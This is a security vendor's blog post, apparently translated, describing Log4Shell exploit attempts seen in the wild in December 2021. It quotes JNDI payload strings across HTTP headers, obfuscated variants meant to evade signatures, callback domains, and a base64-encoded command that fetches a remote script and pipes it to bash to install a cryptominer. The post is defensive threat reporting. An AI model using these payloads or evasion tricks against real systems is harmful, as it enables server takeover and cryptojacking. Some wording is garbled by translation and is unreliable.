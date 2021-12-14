On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a popular Java logging tool. Exploitation of this vulnerability allowed attackers to take control of the affected servers, resulting in a Common Vulnerability Scoring System (CVSS) severity level of 10.

LogJam, also known as Log4Shell, is particularly dangerous due to its simplicity requiring the application to write a single, simple string allowing attackers to upload their own malicious code to the application. To make matters worse, functional PoCs (Proof of Concept) are Already available on the Internet, making even inexperienced attackers a serious threat.

Another reason why this vulnerability is getting so much attention is the massive adoption of Log4j by many companies. Amazon, Steam, Twitter, Cisco, Tesla and many more all use this library, which means that different threat actors have a very wide range of targets to choose from. As the old saying goes, not all systems are vulnerable, not all vulnerabilities are exploitable, and not all exploits are usable, but when all align

Quick attenuation

to Caton, we were able to push the mitigation in no time, as well as deploy it across our network, requiring no action from customers with IPS enabled. The deployment has been announced in our knowledge base with technical details for customers.

In addition, we were able to define our detections on the basis of traffic samples from nature, thus minimizing the rate of false positives from the very first signature deployment and maximizing the protection time for different obfuscation and privacy techniques. bypass.

Here are some interesting exploit attempts that we have seen in the wild. These attempts are a good representation of the life cycle of attacks and their adoption by various threat actors, once such a vulnerability is made public.

Exploit trends and anecdotes

We have found attempted exploits using the normal attack payload:

${ jndi:ldap :// /Exploit}

We have identified some interesting variations and trends:

Adopted by scanners

Interestingly, we came across scenarios of a single IP address trying to send the malicious payload over a wide variety of HTTP headers in a sequence of attempts:

Access-Control-Request-Method: ${jndi:ldap:// :42468/a} Access-Control-Request-Headers: ${jndi:ldap:// :42468/a} Warning: ${jndi:ldap:// :42468/a} Authorization: ${jndi:ldap:// :42468/a} TE: ${jndi:ldap:// :42468/a} Accept-Charset: ${jndi:ldap:// :42468/a} Accept-Datetime: ${jndi:ldap:// :42468/a} Date: ${jndi:ldap:// :42468/a} Expect: ${jndi:ldap:// :42468/a} Forwarded: ${jndi:ldap:// :42468/a} From: ${jndi:ldap:// :34467/a} X-Api-Version: ${jndi:ldap:// :42468/a} Max-Forwards: ${jndi:ldap:// :34467/a}

Such behavior could be attributed to the Qualys vulnerability scanner, which claims to add a number of tests that attempt to send the Log4j vulnerability payloads over different HTTP headers. While it is exciting to see the rapid adoption of testing and analysis tools for this new vulnerability, one cannot help but wonder what would happen if these tools were used by malicious actors.

Chasms created

Inspecting attack traffic allowed us to find sinkhole addresses used to check vulnerable devices. Sinks are servers connected to the Internet that collect traffic sent to them when a PoC vulnerability is successful.

A bunch of HTTP requests with headers like the one below indicate the use of a sinkhole:

User-Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent User-Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}

We can say that theaddress of the chasmmatches the protocol and header on which the exploit attempt succeeds.

This header seen in the wild:

X-Api-Version: ${jndi:ldap:// .burpcollaborator.net/a

This is an example of using theburpcollaboratorplatformin this case, the header used was unusual, trying to bypass security products that might have ignored it.

Among many chasms we also noticed .bingsearchlib.com , as mentionedheretoo much.

Circumvention techniques

The workaround techniques are described in a few different GitHub projects ([1], [2]). These workaround techniques primarily exploit syntactic flexibility to change the payload to one that will not trigger signatures that only capture the traditional PoC example. Others change the target schema from the well-known ldap: // to rmi: //, dns: // and ldaps: //

A funny one that we have found in nature is:

GET /? x= ${jndi:ldap://1.${hostName}. .interactsh.com/a} Host: :8080 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}. .interactsh.com}

Connection: close Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}. .interactsh.com} Accept-Encoding:gzip

In this request, the attacker tried three different attack methods: the normal method (ingreen), as well as two obscured (inmauve and Orange).

Looks like they assumed a target that would modify the request, replacing the malicious part of the payload with a sanitized version. However, they missed the fact that many modern security providers would drop this demand altogether, leaving them exposed to signing and blocking by their weakest obfuscation link.

Real cryptomining attacks on the backs of exploitation victims

While many of the techniques described above have been used by test tools and scanners to show a security risk, we have also found real malicious actors attempting to take advantage of CVE-2021-44228 to remove code. malicious on vulnerable servers. The attacks look like this:

Authorization: ff=${jndi:ldap:// :1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

Base64 decoding of the above payload reveals the intentions of the attackers:

(wget-O http[:]// :8005/acc||curl -o http[:]// :8005/acc)|/bin/bash

Download the named fileaccleads to a bash code that downloads and runs XMrigcryptominer. Additionally, before doing so, it shuts down all existing instances of the miner and shuts them down if their CPU usage is too high to stay under the radar. Needless to say, the mined cryptocurrencies are heading towards the wallet of attackers.

theHoney pot data WITHOUT The API provides access to findings and similar variations of real attacks that target their honeypots.

The Apache Log4j vulnerability presents a significant risk to organizations that fail to mitigate it in time. As we have described, the vulnerability was quickly used not only by legitimate scanners and grade testing tools, but also by novice and advanced attackers. Cato’s customers have been well taken care of. We made sure the risk was quickly mitigated and let our customers know their networks were secure. Read all about it in our blog post:Cato Networks Rapid Response to Apache Log4J Remote Code Execution Vulnerability.Until next time….